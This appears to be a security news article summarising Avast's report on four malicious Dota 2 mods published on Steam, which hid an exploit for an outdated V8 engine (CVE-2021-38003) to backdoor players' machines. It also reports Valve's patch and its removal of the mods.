Avast warned that they were able to detect four malicious Dota 2 game mods that were used by attackers to inject backdoors into players’ systems.
The researchers say that the authors of malicious mods did not distribute them through thematic forums or in other ways, but immediately published them on Steam, trying to attract the attention of the players. The mods were called Overdog no annoying heroes (id 2776998052), Custom Hero Brawl (id 2780728794), and Overthrow RTZ Edition X10 XP (id 2780559339). There was also another mod – test addon plz ignore (id 1556548695), however, judging by the lack of a real payload, the attackers only tested their attacks with it.
“Before the mod can be used by regular players, it must be published on the Steam store. The publishing process includes review by Valve. While in theory this helps weed out some malicious mods, no verification process is perfect, and at least four malicious mods have managed to get past it. We believe that the review process is mainly used for moderation to prevent inappropriate content from being posted. There are many ways to hide a backdoor in the code, and it will take a very long time to try to find them all during the verification process,” the experts explain.
The problem that the attackers exploited was the use of the Dota Panorama framework, developed by Valve itself using the well-known “web triad”: HTML, CSS and JavaScript.
According to experts, the JavaScript part here is very problematic, as it relies on a vulnerable version of the V8 engine (Dota used an outdated v8.dll assembly compiled back in December 2018). As a result, the attackers targeted the CVE-2021-38003 vulnerability, discovered several years ago in V8 JavaScript and WebAssembly. This problem was used in attacks as 0-day back in 2021, PoC exploits have been available for it for a long time, and it was fixed by developers e in October 2021.
By exploiting this bug, malicious JavaScript was able to exploit a vulnerability in V8 and take control of the player’s machine. At the same time, the exploit was embedded in a legitimate file that added the functionality of the scoreboard to the game, making it difficult to detect.
“The backdoor allowed any JavaScript received over HTTP to be executed, giving the attacker the ability to both hide and modify their exploit code at their own discretion (without going through the verification process again), as well as the ability to completely update the entire mod,” says Avast. “Because V8 in Dota was not sandboxed, the exploit allowed remote code execution to be used against players.”
In addition, in addition to the backdoor, the attacker embedded a file called evil.lua into his mods, which was used to test the ability to execute Lua on the server side. This malicious snippet could be used for logging, executing arbitrary commands, creating coroutines, and sending HTTP GET requests.
Avast analysts reported their discovery to Valve developers, and on January 12, 2023, they updated the vulnerable version of V8. In addition, Valve has removed malicious game mods from Steam and warned all players affected by this attack.